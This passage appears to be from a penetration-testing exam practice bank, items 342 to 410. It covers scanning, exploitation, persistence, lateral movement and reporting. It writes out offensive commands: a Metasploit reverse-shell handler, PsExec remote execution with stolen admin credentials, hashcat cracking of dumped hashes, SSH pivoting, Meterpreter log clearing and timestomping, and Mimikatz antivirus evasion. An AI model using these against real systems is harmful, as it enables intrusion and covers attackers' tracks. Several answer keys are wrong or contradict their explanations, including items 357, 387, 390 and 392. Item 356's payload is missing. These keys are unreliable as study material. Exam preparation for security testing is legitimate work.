TO be able to take advantage of the credential extraction functionality that Mimikatz offers, it would need to be migrated to a 64-bit process, because it uses 64-bit functions
342
When covering your tracks on a Windows machine by using Meterpreter, what command will help you clear all events from the logs?
A.clearevtx
B.clearev
C.clearevt
D.delete events
B.clearev
Explanation:
Meterpreter is very powerful and provides a lot of functionality. When clearing your tracks, you can use clearev to clear the event logs and also timestomp to change any files' timestamps, if necessary.
343
Timestomping is a technique for doing what?
A.Establishing persistence
B.Exploiting a Linux kernel
C.SQL Injection
D.Covering tracks
D.Covering tracks
Explanation:
Timestomping is a method of modifying the MAC times of files on a system in order to confuse the incident investigation.
This is usually used by attackers to cover their tracks
344
You are trying to set up a SOCKS proxy on a compromised Linux machine and use it to scan internal machines. Which command should you choose?
A.SSH -D 9050 www.compromisedmachine.com
B.telnet compromisedmachine.com
C.nc -L -p 8080 compromisedmachine.com
D.SSH -L 8080:www.compromisedmachine.com:80 targeted machine.com
A.SSH -D 9050 www.compromisedmachine.com
Explanation:
SOCKS, which stands for Socket Secure, is a network protocol that facilitaties communication with servers through a firewall by routing network traffic to actual server on behalf of a client.
SOCKS is designed to route any type of traffic generated by any protocol or program.
A SOCKS proxy server creates a Transmission Control Protocol (TCP) connection to another server behind the firewall on the clients behalf, then exchanges network packets between the client and the actual server.
The SOCKS proxy server doesnt interpret the network traffic between client and server in any; it is often used because clients are behind a firewall and are not permitted to establish TCP connections to outside servers unless they do it through the SOCKS proxy server..
Therefore, a SOCKS proxy relays a users TCP and User Datagram Protocol (UDP) session over firewall
SSH -D 9050 www.compromisedmachine.com will create a connection to the compromisedmachine.com on port 9050. Once this is established, you could use any tool which supports SOCKS proxy and set it up to use port 9050 on the localhost.
345
Alex is conducing a network scan, but he is only able to find half the hosts in the network using a regular Nmap command. When he adds "-Pn" to the command line, all hosts appear in the results. How is "-Pn" affecting the results?
A.-Pn configures the scanner to find offline hosts
B.-Pn disables ICMP requests
C.-Pn is a UDP scan, and hosts respond to UDP traffic
D.-Pn enables Nmap to use DNS queries
B.-Pn disables ICMP requests
Explanation:
-Pn means "disable ping" or "do not use ICMP echo requests" to determine if a host is online or not. Many operating systems are configured not to respond to ICMP echo requests (or ping). With a default configuration, Nmap would assume hosts not responding to ping were offline hosts and would skip them.
346
On modern Linux machines, where are the user passwords stored?
A./etc/shadow
B./etc/users
C./etc/passwd
D./root/passwords
A./etc/shadow
Explanation:
/etc/shadow is a text file that contains information about the systems users passwords.
It is owned by user root and group shadow, and has 640 permissions
/etc/passwd is a text file that contains the attribute of (ie basic information about) each user or account on a computer running Linux or another Unix like OS
347
George is performing a pentest and would like to capture the traffic he is generating and possibly analyze it later. What tool could he use for both actions?
A.Arpspoof
B.Brup Suite
C.Wireshark
D.Nessus
C.Wireshark
Explanation:
Packet capture has another major use during penetration tests; documentation.
One of the most powerful tools for capturing traffic and at the same time using it for packet analysis is Wireshark
During testing, pentester attempt to capture most, if not all, of the traffic associated with their pentesting efforts.
If something goes wrong, the logged traffic can be used to document what occurred and when,
Packet captures can also be useful if you think you missed something or cannot get a response to reoccur.
Because of its intuitive interface, WIreshark can easily be used to review the traffic and find any possible issues
348
Which Nmap scan method is considered the default and most popular and is also known as half-open scanning?
A.TCP FIN (-sF)
B.No Ping (-Pn)
C.TCP SYN (-sS)
D.UDP Scan
C.TCP SYN (-sS)
```
Explanation:
TCP SYN (Stealth) Scan (-sS) SYN scan is the default and most popular scan option for good reason.
```
It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by intrusive firewalls.
It requires raw-packet privileges, and is the default TCP scan when they are available.
Because the three-way handshake is never completed, SYN scan is sometimes called half-open scanning
349
What result can be expected from a fingerprinting scan against a network segment?
A.List of vulnerabilities found in the network
B.List of all hosts on the network that are online
C.Hosts with biometric security features
D.Host operating systems and service identification
D.Host operating systems and service identification
Explanation:
The ability to identify an operating system based on the network traffic that it send is known as operating system fingerprinting and it can provide use information when performing reconnaissance
350
Which of the following is the best motivation technique could Alex use in the spear-phishing campaign she is preparing for a pentest?
A.Prepare the email in such a way that it will appear to be sent by higher management
B.Mark the email as "high importance"
C.Sign the email with the company logo
D.Send the email several times to make sure it is received and seen by all
A.Prepare the email in such a way that it will appear to be sent by higher management
Explanation:
By pretending to be a higher ranking manager, Alex is using authority motivation
Sending the email multiple times would not make it more plausible; if anything, it would appear less genuine
Marking it as "high importance" could potentially have some impact, but nothing in comparison to impersonating higher management
Using the company logo is easy; downloading it from the internet would suffice. But this would likely to be easily be spotted by the target
351
George is using a web browser to test the targeted web application. He would like the option to intercept his HTTP request before it hits the site and manipulate some of its parameters. Which tool can provide this functionality to George?
A.Nmap
B.Burp Suite
C.Nikto
D.Nessus
B.Burp Suite
Explanation:
Burp Suite is a powerful tool that provides a proxy functionality. It is able to capture the HTTP request and allow manipulation.
352
What is the best remediation technique for an SQL injection vulnerability?
A.Usage of WAF
B.Cloudflare
C.Validating user input and parameterizing queries
D.Blacklisting bad characters
C.Validating user input and parameterizing queries
Explanation:
By validating user input and parameterizing queries, you make the application itself more secure
Entrusting SQL injection protection to WAF or third-party solutions like Cloudflare is bad practice.
Those solutions are additional layers of security but cannot guarantee 100 percent protection
Blacklisting characters is the wrong way to go, as there are many obfuscation techniques and there is no way to be sure that all bad characters are blacklisted.
Also some might be needed for normal operation of the web application
353
Each Common Weakness Enumeration (CWE) record should include:
A.Exploitation method
B.Weakness ID
C.Information about the person that discovered it
D.Tool to exploit it
B.Weakness ID
Explanation:
Each Common Weakness Enumeration (CWE) record should include a weakness ID>
The name of each CWE is also its ID.
For example, CWE-36 stands for "Absolute Path Traversal"
354
James is attempting to capture traffic between his target and a targeted website. His goal is to capture the cookie and later use it in a session hijacking attack. However, for some reason he is unable to capture the cookie, which is not transmitted over plain text HTTP. What could be the reason for this?
A.There is a WAF in front of the website
B.Cookies are never transmitted over HTTP
C.The cookie is set with a secure flag
D.The website does not use cookies
C.The cookie is set with a secure flag
Explanation:
The secure flag is used to ensure a cookie never makes its way over an unencrypted connection, like HTTP.
This helps prevent against credential theft when a malicious user is sniffing the network
355
Which of the following statements is true?
A.Only external entities could conduct a pentest
B.The pentest is never intrusive and only lists the vulnerabilities found
C.The pentest is limited to the devices and services listed in the scope
D.All pentesters were malicious threat actors in the past
C.The pentest is limited to the devices and services listed in the scope
Explanation:
The scope of the test defines all machines that should be tested, services running on those machines, and any other details that should be included. Unless a target is specifically listed in the documented scope, it should not be tested
356
Alex has found SQL injection vulnerability on a targeted website. The SQL injection allows Alex to update columns in the SQL database. One of the strings that Alex has injected in the database is as follows:
![]()
What is Alex attempting in addition to the SQL injection?
A.CSRF
B.HTML injection
C.Stored XSS
D.Reflected XSS
C.Stored XSS
Explanation:
Alex is attempting to store injection in the database to steal and redirect a session token.
The stored XSS could later be accessed through a web interface by an administrative user.
This would allow Alex to steal the administrative user session
357
You are being tasked to perform a scan against the subnet 10.0.10.0/24 and find all running services on ports between 100 and 2000. You need to determine the software version and OS each host. You know that there is no firewall, but this task is time sensitive.
Which Nmap command would you choose?
A.Nmap -S -A -Pn -p 100-2000 10.0.10.0/24
B.Nmap -sA -Pn -P 100-2000 10.0.10.0-254
C.Nmap -Pn -S -p 2000 10.0.10.0
D.Nmap -sS -Pn -p 100-2000 10.0.10.0/24
A.Nmap -S -A -Pn -p 100-2000 10.0.10.0/24
Explanation:
Using -sS will tell Nmap to perform SYN scan (using a fast method, -A will ask Nmap to attempt OS and software version detection
-Pn will tell Nmap to treat all hosts as live and -p 100-2000 will define the port range.
Finally, you provide the subnet using /24 as a mask identifier
358
What can John use to grab the banner of a web application?
A.WHOIS service
B.Dirb
C.Gobuster
D.Netcat
D.Netcat
Explanation:
Netcat is a handy tool for banner enumeration.
WHOIS records cannot do banner grabbing of specific services on specific ports. Dirb and Gobuster are tools for brute-forcing directories and files.
359
What sort of compliance-based assessment would come into play for systems that are covered in the compliance assessment but are maintained separately from the other elements of the organizational infrastructure?
A.Data isolation compliance assessment
B.User access compliance assessment
C.Password policy compliance assessment
D.Key management compliance
A.Data isolation compliance assessment
Explanation:
Understanding how the data isolation design fits in the context of the organization's infrastructure is crucial. Data isolation is also an important concept to understand when dealing with third-party service providers.
360
Obtaining client acceptance usually involves which of the following actions?
A. A face-to-face meeting on the topic of the report
B.Receiving payment for the engagement
C.Notifying the client that the test is completed
D.COmpleting the post-engagement cleanup
A. A face-to-face meeting on the topic of the report
Explanation:
In most cases, a face-to-face meeting with the client and the penetration testers is held. The meeting is focused on the report results and any questions that the client or their security representatives might have.
361
Jeremy has found a SQL injection vulnerability and would like to use it to elevate his user privileges. He found the database, table, and column that he needs to modify to make his account administrative. What type of query does he need to perform to change a digit from 0 to 1 on the "admin" column on the database?
A.UPDATE Statement
B.SELECT statement
C.DELETE statement
D.INSERT INTO statement
A.UPDATE Statement
Explanation:
Structured Query Language (SQL) is a standard language for storing, manipulating and retrieving data in databases.
SQL can:
- execute queries against a database
- retrieve data from a database
- insert records in a database
- update records in a database
- delete records from a database
- create new databases
- create new tables in a database
- create stored procedures in a database
- create views in a database
- set permissions on tables, procedures and view
The UPDATE statement is used to modify the existing records in a table..
The DELETE statement is used to delete existing records in a table
The SELECT statement is used to select data from a database
The INSERT INTO statement is used to insert new records in a table
362
Tim has asked Peter if he can scan his website for vulnerabilities and old versions. Which tool is most suitable for getting this information in a passive way?
A.Burp Suite
B.DirBuster
C.Nikto
D.WFuzz
A.Burp Suite
Explanation:
Burp Suite would be the most suitable tool because it uses a proxy to intercept the HTTP requests going to and from a website in an easily readiable way
Nikto is an open-source web application scanning tool that uses a command line interface that does not have a proxy and cannot intercept HTTP requests
Wfuzz is a web application "fuzzer" that uses payloads of data to sniff out directories, files, or headers.
It cannot intercept HTTP requests
DirBuster is a tool used for finding directories in a web application, not to intercept HTTP requests
363
While attempting buffer overflow technique, Alex notices that in each attempt the stack pointer address value changes randomly. What is the most likely cause for this behavior?
A.The kernel is compiled with ptrace set to 0
B.AppArmor is enabled
C.The kernel is likely compiled with the SELInux
D.ASLR protection is enabled
D.ASLR protection is enabled
Explanation:
By definition, Address Space Layout Randomization (ASLR) is a computer security technique which involves randomly positioning the base address of an executable and the position of libraries, heap and stack in a processes' address space
Essentially, ASLR randomizes the memory space, such that the fixed location contents are different each time the program is executed.
This will render any malicious payload useless.
ASLR is a buffer overflow protection
```
AppArmor is a Linux kernel security module that allows the sysadmin to restricts programs capabilities with pre-program profiles.
Profiles can allow capabilities like network access, raw socket access, and the permission to read, write or execute files on matching paths
```
364
Local admin privileges could be used to disable the User Access Control mechanism and thus allow remote login over which protocol?
A.VNC
B.SMB
C.SSH
D.Telnet
B.SMB
Explanation:
User Account Control (UAC) is a security mechanism designed to limit the ability of a piece of malware to take total control of your system or network.
However, developers with local administrative access can possibly disable this feature and potentially allow remote logins over SMB (server message block) or RDP with the local admin account
365
When developing a remediation plan, which metric is not important and can be ignored?
A.Public exploits available
B.Exposure of the vulnerability
C.Criticality of the system and information affected by the vulnerability
D.Difficulty of remediating the vulnerability
A.Public exploits available
Explanation:
Although it might have some impact on the exploitation of the vulnerability if there are available public exploits, it is not usually a deciding factor in the remediation planning.
Exploits for a specific vulnerability might be available but not released publicly; thus other factors such as criticality, exposure, severity and so on are more relevant
366
What method could be used to maintain persistence using a reverse shell?
A.ENable Windows Remote Assistance
B.Install a service that opens a port on the host
C.Create a scheduled task that "calls home"
D.Establish a NC session with the attack
C.Create a scheduled task that "calls home"
Explanation:
Create a scheduled tasks that executes a script or command that connects to the attack hosting and provides shell access.
It is very similar to establishing a NC session with the attacking hist; however, because it is a scheduled task it also will survive a restart; hence the persistence
367
George was able to dump the password hashes from the SAM database of a Windows domain controller into a "hash.txt" file. He is trying to crack the passwords offline in his lab using a list of passwords from a "wordlist1.lst" file. Which command would he use?
A.hashcat --crack=hash.txt --wordlist=wordlist1.txt
B.hashcat wordlist1.lst --passwords hash.txt
C.hashcat -m 1000 -a 0 wordlist1.lst --username hash.txt
D.hashcat -m 1000 -a 0 --force --show --username hash.txt wordlist1.lst
D.hashcat -m 1000 -a 0 --force --show --username hash.txt wordlist1.lst
Explanation:
Hashcat is a password-cracking utility that uses graphics processing units (GPUs) to crack passwords at a very high rate of speed. Hashcat is much faster than traditional tools (like John the Ripper, which is CPU-bound), making it a tool of choice if you have access to appropriate hardware.
368
In Meterpreter, what would the following command do?
'timestomp -a '
A.Print out the local time of the system
B.Set the last access time of a file
C.Migrate to a Timestomp process
D.Set all MAC times of a file
B.Set the last access time of a file
Explanation:
This technique can be executed by an attacker against files/directories that were modified.
The TImestomp feature in a Meterpreter shell can be a good way to limit the digital footprint of reading/writing data on the file system
369
During the enumeration phase, George is using port scanners like Nmap to identify hosts on the targeted network. What other methods could he use to improve his results?
A.Use ICMP Requests
B.Search through SCCMs or other inventory systems
C.Use firewall detection techniques
D.Scan multiple times
B.Search through SCCMs or other inventory systems
Explanation:
In some tests (usually white box or grey box) an SCCM (system center configuration manager) or other inventory systems is available to the pentesters
A simple search in those systems might reveal hosts that are not detectable by regular port scanning
370
Given the Metasploit excerpt below, what type of attack is being attempted?
$ ./msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run
A.Binding Shell
B.Pass-the-hash
C.Reverse shell
D.USer enumeration
C.Reverse shell
Explanation:
The Metasploit Meterpreter shell and reverse shell are effective ways of interacting with a target environment, as they run entirely in memory and leave little or no trace after disconnecting
371
George completed a scan of the client's server. He discovered a running SMTP service on port 587. He tested the service for all known exploitations, and it failed. When he reported the open port, the client was surprised and informed George that this SMTP was no longer used. How should George handle the SMTP service in his report?
A.George should suggest the SMTP be stopped and the port be closed, as it is no longer needed
B.As long as the service is secure and not exploitable, there is no harm in keeping it running
C.This is not George's concern, because it was also new to the client
D.Additional security layers should be added to this service if possible
A.George should suggest the SMTP be stopped and the port be closed, as it is no longer needed
Explanation:
All unused services should be stopped and all unused ports should be closed. Even though this service was not exploitable at the time, it could be exploited later.
372
What would be the result of the following command?
airmon-ng start wlan0 9
A.Attempt to connect to wlan0 9 times
B.Start of 9 monitoring interfaces for wlan0
C.Use 9 as a password for wlan0 network
D.Start a Wi-Fi monitoring interface on channel 9
D.Start a Wi-Fi monitoring interface on channel 9
Explanation:
The "airmon-ng" command is included in the Aircrack-ng suite of tools, in order to configure an adapter in monitor mode.
373
While conducting a penetration test, Alex notices that her scans reveal new hosts on the targeted network. Those hosts are not listed in the initial scope document and were only revealed through extensive testing. What sort of scenario has developed?
A.Technical constraint bypass
B.Scope creep
C.Scope Increase
D.Contract breach
B.Scope creep
Explanation:
Scope creep occurs during a pentest when additional tasks or testing activities are added to the project and exceed the original expectations documented in the statement of work. This can negatively affect the overall schedule or delivery of the final pentest report.
374
James notices that the targeted company tends to throw out all hard copies of documents in two trash cans behind the building. One day, after working hours, James goes to those cans and reviews all the documents that have been thrown out. Luckily, he manages to find a username and password in a change document. What social engineering technique has James used to gain this information?
A.Fence Jumping
B.Tailgating
C.DUmpster Diving
D.Piggybacking
C.DUmpster Diving
Explanation:
Dumpster diving is a social engineering method used to retrieve sensitive information from an organization’s dumpster/trash in order to attack the computer network. The objective is to find sensitive information that may not have been shredded, such as usernames, passwords, software, account information, financial statements, meeting notes, etc.
375
George is sending his pentest conclusion report via email in an encrypted archive. How should he provide the client with the archive password?
A.Along with the report in the same email
B.Via SMS or a communication method other than email
C.In an email sent one day after the first one
D.In a separate email sent immediately after the first one
B.Via SMS or a communication method other than email
Explanation:
You should not use the same delivery mechanism for the decryption password as you do for the encrypted report. This way, you maximize continuity and reduce the risk of unauthorized disclosure should one path become compromised.
376
You are configuring a scan with Nessus. This is a grey box test and you know that the targeted subnet only contains Linux hosts. What could you do to fine-tune the scan?
A.Use only TCP port discovery for the scan
B.Schedule the scan for out of office hours
C.CHange the detection method to consider all hosts as live and not use ICMP for host detection
D.In the scan configuration, disable all Windows related plugins as they would not apply for Linux hosts
D.In the scan configuration, disable all Windows related plugins as they would not apply for Linux hosts
Explanation:
Disable the plugins that would not apply for Linux hosts. Nessus comes with a wide variety of plugins and it would help improve scanning speed and results if you disable plugins that do not apply.
377
James has found a vulnerable Android tablet on the client's network. He is able to upload files to it and have them executed. The tablet is running on an ARM64 platform, and James is running on a x64 platform. What technique should he use to deploy a malicious binary that would be executed under ARM64?
A.Run Metasploit for Android
B.Cross-compile Code
C.There is no technique that would build ARM64 binary on a x64 platform
D.DOwngrade to x86 before compiling the code for the ARM64 platform
B.Cross-compile Code
Explanation:
Cross-compiling is used when the targeted platform is running a different architecture. Actual cross-compiling like GCC could compile to multiple architectures, but the binaries would only run on the targeted platform.
378
```
James is in proximity of the client's office. He is getting a perfect Wi-Fi signal from the office access point (AP). He needs to trick the client into sharing their RADIUS login credentials. Which tool could he use?
A.Evil Twin
B.Nikto
C.hping
D.Metasploit
```
A.Evil Twin
Explanation:
One way to trick the client into sharing their RADIUS login credentials is to act as a fraudulent Wi-Fi access point, otherwise known as the Evil Twin. HostAP (in Kali Linux: apt-get install hostapd) is a popular access point software that can be run from a computer operating system such as Kali Linux. It allows the host to perform all functions of a typical wireless router. For WPA and WPA2 enterprise networks, HostAP provides support for RADIUS authentication and supports the ability to carry out impersonation attacks against wireless clients.
379
Alex is conducing a penetration test. She needs to scan a list of target IP addresses combined with hostnames. How could she use her text file and feed it to Nmap for scanning?
A.She could use the Nmap flag "--file" to provide Nmap with the list of targets
B.She could use the Nmap flag "-iL" to provide Nmap a file with targets
C.She could use the "--hosts" flag to provide a list to Nmap
D.She could use a "--target" flag to feed the list to Nmap
B.She could use the Nmap flag "-iL" to provide Nmap a file with targets
Explanation:
The "-iL" flag is used if Nmap needs to take its targets from a source file.
380
RTOSs usually have one significant weakness. What is it?
A.They are known to have weak credentials
B.They are prone to remote code execution
C.They are difficult to patch
D.They are prone to buffer overflow
C.They are difficult to patch
Explanation:
Real-time operating (RTOSs) are difficult to patch; the patches are typically in the form of a firmware update or upgrade and are not released often or by many vendors
381
Which metrics could be useful for an organization to determine the overall impact of a vulnerability to the environment, if exploited?
A.Number of hours needed to be exploited
B.Common Vulnerability Scoring System
C.Pentester's Vulnerability Scoring System
D.Exploit DB vulnerability score
B.Common Vulnerability Scoring System
Explanation:
The common vulnerabilities and exposure (CVE) dictionary is the standard for documenting publicly disclosed vulnerabilities NIST maintains the National Vulnerability Database (NVD), which performs analysis on the vulnerabilities that have been published to the CVE dictionary, using the Common Vulnerability Scoring System (CVSS).
The results of the analysis provide metrics that can be used by an organization to determine the overall impact of a vulnerability to the environment, if exploited
382
Besides security awareness training for employees, which of the following would be the best way for a client to limit the number of fraudulent emails received?
A.Limit mail server access to company employees
B.Close all unnecessary ports on the mail servers
C.Implement email content filtering to block inbound messages that appear to come from internal sources without proper authentication
D.Implement additional AV and IDS solutions that would monitor traffic for suspicious emails
C.Implement email content filtering to block inbound messages that appear to come from internal sources without proper authentication
Explanation:
Technological controls provide effective defenses against security threats.
For example, an organization might implement email content filtering to block inbound messages that appear to come from internal sources without proper authentication.
They may also filter out messages containing high-risk
key words coming from known malicious sources
383
What is one of the main reasons for running Mimikatz from memory?
A.32-bit and 64-bit support
B.Multithreading
C.Fast results
D.Evasion
D.Evasion
Explanation:
Running Mimikatz in memory rather than on disk has benefits, such as antivirus evasion.
You can also use some trivial encoding or obfuscation techniques like updating Invoke-Mimikatz.ps1 command from the PowerSploit framework until it can no longer be detected by antivirus signatures
384
When you fingerprint a system and try to determine the services and the software version of each open port, which Nmap flag would you use?
A.-version
B.-A
C.-r
D.-v
B.-A
Explanation:
Nmap -A option enables service version detection and host OS detection. This flag will attempt to identify the services listening on all open ports and the current software version of each one. Using heuristics, Nmap will also attempt to determine the host OS.
385
When attempting to test the security of an IOS application, which tool would James most likely choose?
A.APKX
B.Drozer
C.iGoat
D.APK Studio
C.iGoat
Explanation:
iGoat and DVIA (Damn Vulnerable iOS App) were developed to assist pentesters and security researches with testing against common weaknesses in a safe and legal environment
386
At what risk level would you categorize a vulnerability with a CVSS v3 score between 9 and 10?
A.Low
B.Critical
C.High
D.Information
B.Critical
Explanation:
According to CVSS v3, there are five categories of risk:
CVSS score between 9 and 10 - Critical
CVSS score between 7 and 8.9 - High
CVSS score between 4 and 6.9 - Medium
CVSS score between 0.1 and 3.9 - Low
CVSS score 0 - None
387
Is it important to add the pentest limitations to the pentest report?
A.These limitations are already listed in the scope or SOW, so there is no need to present them again
B.It is irrelevant whether the limitations are in the pentest report
C.Yes, they need to be included in order to provide comprehensive understanding of the security posture
D.Only if they are affecting the results of the test
B.It is irrelevant whether the limitations are in the pentest report
```
Explanation:
Some limitations (for example, no DDoS, no social engineering, or exclusion of some legacy machines) could seriously impact the outcome of the test. By listing the limitations, you prevent the false sense of security that a client might gain based on some results of the report.
```
388
In a man-in-the-middle attack, Alex is able to capture traffic between the targets and a company website. However, the traffic is encrypted and Alex is unable to take advantage of it. What technique should Alex try in order to get plain text traffic between the target and the site?
A.SSL Stripping
B.Arpspoofing
C,DNS Cache Poisoning
D.Enabling Promisc mode
A.SSL Stripping
Explanation:
During man-in-the-middle attacks, it may be necessary to set up a proxy service to force SSL stripping from client requests, so that when a client goes to connect to an SSL-enabled website, the certificate will be stripped from the session and the browser window will not display any SSL certificate message.
389
What is George attempting with the following command?
'nmap -n -sn 10.0.0.1/24 -oX file'
A.George is scanning for vulnerable hosts from a file list
B.George is doing a ping scan and outputting the results in XML format
C.George is testing exploits from the file against the network segment 10.0.0.1/24
D.George is doing a running services scan and outputting the results in grepable format
B.George is doing a ping scan and outputting the results in XML format
Explanation:
An Nmap ping scan (-sn or -sP flag) is a simple method of determining if a host is alive on the network. The ping scan uses the layer 3 Internet Control Message Protocol (ICMP) for sending ping probes to hosts over the network. Hosts communicate over the network using ICMP messages, which are defined as specific types and codes that determine the state of the communication.
390
Which of the following are at the bottom of the adversary tier?
A.Script kiddies
B.Hackers
C.APTs
D.Professional Black Hats
C.APTs
Explanation:
APT stands for Advanced Persistent Threat.
APTs are the most motivated and well-prepared threat actors and are therefore at the bottom of the adversary tier.
Professional black hats are in the middle of the adversary tier.
Script kiddies are at the top of the adversary tier, as they are less prepared and skilled.
Hackers are not in the adversary tier.
391
Which of the following would be a possible way to bypass an optical fingerprint sensor?
A.Fingerprint sensors are not vulnerable to attack
B.You could try using a picture of the fingerprint
C.You could try brute-forcing the sensor
D.You could try a DoS attack that would put it in service mode
B.You could try using a picture of the fingerprint
Explanation:
As it is an optical fingerprint sensor, it would operate by using a camera and comparing the image of the fingerprint to a database of images. Therefore, this sensor might be tricked by an image of the fingerprint.
392
What command should you use to find what permissions you have on a database in MySQL?
A.privileges
B.access;
C.Show access;
D.privileges;
D.privileges;
Explanation:
MySQL database does have an extensive list of privileges associated to a user for any given database. You could have users that are only able to read the database. There are cases, where users only have permissions to create and update, but no drop any tables or delete anything. Information about account privileges is stored in the grant tables in the mysql system database. It is important not forget the semicolon (;) at the end of the command.
393
What does George need to do so as not to hit the API quotas when performing application vulnerability scanning?
A.Have an additional internet connection
B.Perform query throttling
C.Get client approval for exceeding quota
D.Use a lightweight vulnerability scanner
B.Perform query throttling
Explanation:
When performing a penetration test, there are several aspects that need to be considered. The appropriate time for testing might be specific based on the business of the client. In some cases, the application that is being tested has specific query quotas that need to be taken into consideration.
394
What is Ret2libc?
A.A buffer overflow for Windows machines
B.A tool for passing the hash
C.Buffer overflow attack for Linux machines
D.A memory analysis tool
C.Buffer overflow attack for Linux machines
Explanation:
The “return-to-libc” (Ret2libc) attack is a technique used to hijack program control flow by exploiting a buffer overrun vulnerability in subroutines in libc.
395
Consider the following example:
https://target.com/vendors.php?vendID=4
You suspect that the "vendID" parameter is vulnerable to SQL injection. How would you proceed to exploit it?
A.wget "https://target.com/vendors.php?vendID=4"
B.curl "https://target.com/vendors.php?vendID=4"
C.sqlmap -u "https://target.com/vendors.php?vendID=4"
D.hping "https://target.com/vendors.php?vendID=4"
C.sqlmap -u "https://target.com/vendors.php?vendID=4"
Explanation:
To evaluate whether a parameter is injectable, such as the id= field in this example, you may need to try a series of injection criteria to elicit an error from the database. SQLmap would be able to do this test automatically.
396
One way of finding potential weak points on a website during a pentest is by accessing resources that are usually hidden or not available through browsing the site. What tool would provide such functionality?
A.Zenmap
B.nc
C.DirBuster
D.hping
C.DirBuster
Explanation:
The DirBuster tool is a multi-threaded java application that is used to perform brute force over directories and file names on web and application servers. DirBuster attempts to find hidden directories and pages within a web application, providing users with an additional attack vector.
397
In what situation might George, as a pentester, be required to provide an attestation of his findings to his client?
A.When the client is unhappy with the results
B.In a compliance-based engagement
C.In a court of law
D.Attestation of findings is provided with each pentest report
B.In a compliance-based engagement
Explanation:
If the client conducted the test as part of a regulatory or contractual commitment, they may request that the tester prepare a formal attestation of their work and findings.
398
What would be considered the formal confirmation that the pentesters have successfully completed the agreed-upon scope of work?
A.Client acceptance
B.Receiving of payment
C.Completion of the post-engagement cleanup
D.Provision of the conclusion report
A.Client acceptance
Explanation:
Pentesters should obtain formal client acceptance of their deliverables. This may simply be a written acknowledgment of the final report, but it usually includes a face-to-face meeting where the testers discuss the results of the engagement with business and technical leaders and answer any questions that might arise.
399
```
What would James need to acquire in order to conduct a successful pass-the-hash replay attack?
A.Username hashes
B.MySQL hashes
C.Rainbow tables
D.NTLM Hashes
```
D.NTLM Hashes
Explanation:
One of the most common replay attacks used by pentesters is an NTLM pass-the-hash attack. Once the NTLM hashes are acquired, pentesters can identify systems that do not need SMB signing. When targets are selected, the attack can be carried out with the help of an NTLM relay tool.
400
An attacker is able to input malicious JavaScript into a comment entry under a post on a web page. This script is executed upon loading the page with the post. What type of vulnerability does this describe?
A.Reverse shell
B.Reflected cross-site scripting (Reflected XSS)
C.Stored cross-site scripting (stored XSS)
D.SQL Injection
C.Stored cross-site scripting (stored XSS)
Explanation:
Stored or persistent XSS is a vulnerability much like reflected XSS; however, it does not disappear upon reloading of the page.
401
You are doing a reconnaissance using Shodan. You want get a list of all Shodan indexed machines from a subnet of internet facing servers that have port 1194 opened. For the purpose of this test, the subnet is 8.8.8.0/24 (Google). What will your Shodan query be?
A.8.8.8.0/24 1194
B.hosts: 8.8.8.0/24 port:1194
C.port:1194 net:"8.8.8.0/24"
D.ip 8.8.8.0/24 tcp: 1194
C.port:1194 net:"8.8.8.0/24"
Explanation:
The correct command for shodan requires "port" and "net" parameters. The network segment also needs to be in quotes. Therefore, the correct Shodan query is port:1194 net:”8.8.8.0/24”.
402
Alex is involved in a pentest. The client would like to pay for the test using milestones. Which document should be used to specify the payment schedule?
A.Master payment agreement
B.Rules of engagement
C.Master Service Agreement
D,Nondisclosure Agreement
C.Master Service Agreement
Explanation:
The master service agreement (MSA) documents the following topics:
Payment terms
Product warranties
Intellectual property ownership
Dispute resolution
Allocation of risk
Indemnification
403
George has gained access to a Windows machine. By dumping the SAM database and cracking it, George has obtained a domain admin's credentials. How could he use these credentials for a lateral movement to another machine without making too much noise?
A.The domain admin account will not work on other machines in the environment
B.Use Telnet to connect to other machines
C.Start looking for RDP services running in the network
D.Use PsExec and execute commands remotely on another machine
D.Use PsExec and execute commands remotely on another machine
Explanation:
An example of a PsExec remote command:
./PsExec.exe -u domainadmin -p adminpass //remotehost cmd
This will open a cmd session on the remote host
404
What tool could be used for PowerShell remoting between two Windows hosts?
A.Scheduled Tasks
B.Remote Desktop
C.SSH
D.WinRM
D.WinRM
Explanation:
The Windows Remote Management (WinRM) protocol is a feature of PowerShell that provides native Windows remote command execution.
405
What sort of vulnerability could be exploited if a website is serving content on both port 443 and port 80 and there is no HSTS (HTTP strict transport security) protection enforced?
A.Cross-site scripting
B.Cross-Site Request Forgery
C.SQL Injection
D.SSL Stripping or downgrading
D.SSL Stripping or downgrading
Explanation:
SSL stripping, also known as downgrading, is an exploitation technique that allows an attacker to capture plaintext traffic during man-in-the-middle attacks.
406
Would it make any difference if the machines you were targeting for your client's pentest were hosted by another entity?
A.In many cases, you would need formal approval from the hosting company or the cloud provider
B.Only if the assets were hosted in specific places that would require notification or authorization
C.As long as the assets belong to your client, it doesnt matter where they are hosted
D.This is for the client to determine; all you need is your clients approval
A.In many cases, you would need formal approval from the hosting company or the cloud provider
Explanation:
If the targets are hosted in a third-party environment, such as a cloud service provider (CSP), testing is not only subject to the company’s policies, it is also subject to the third party’s acceptable use policies. For instance, Amazon Web Services (AWS) requires that tenants submit pentesting request forms to receive authorization prior to penetration testing to or from any AWS resource.
407
What can Nathan use to collect information about the network, including packets, MAC, IP addresses and unencrypted traffic content?
A.Nmap
B.Airmon -ng
C.Aircrack -ng
D.Wireshark
D.Wireshark
Explanation:
Wireshark is a sniffer and packet analyzer that can capture all kinds of traffic
Nmap is a simply a scanner
Aircrack-ng is software for brute-forcing wireless networks
Airmon-ng is part of the Aircrack page and cannot capture packets
408
What is vulnerability mapping?
A.Vulnerability mapping is the process of prioritizing vulnerabilities
B.Vulnerability mapping is a process of matching vulnerabilities to hosts on a network
C.Vulnerability mapping is using geolocation to tag hosts
D.Vulnerability mapping is using Zenmap and matching network topology to vul;vulnerability scan results
A.Vulnerability mapping is the process of prioritizing vulnerabilities
Explanation:
Vulnerability mapping is the process of prioritizing a vulnerability based on its usefulness to a malicious actor (i.e., does it allow remote code execution, facilitate privilege escalation, create data disclosure, or enable lateral movement?).
409
What is usually being tested when Burp Suite Pro is used?
A.Network segment
B.Web Application
C.Linux Server
D.Wireless network
B.Web Application
Explanation:
Burp Suite Pro and Burp Suite Community are tools developed by PortSwigger for Web Application testing. They act as a local proxy, but do posses multiple plugins and a very wide functionality.
410
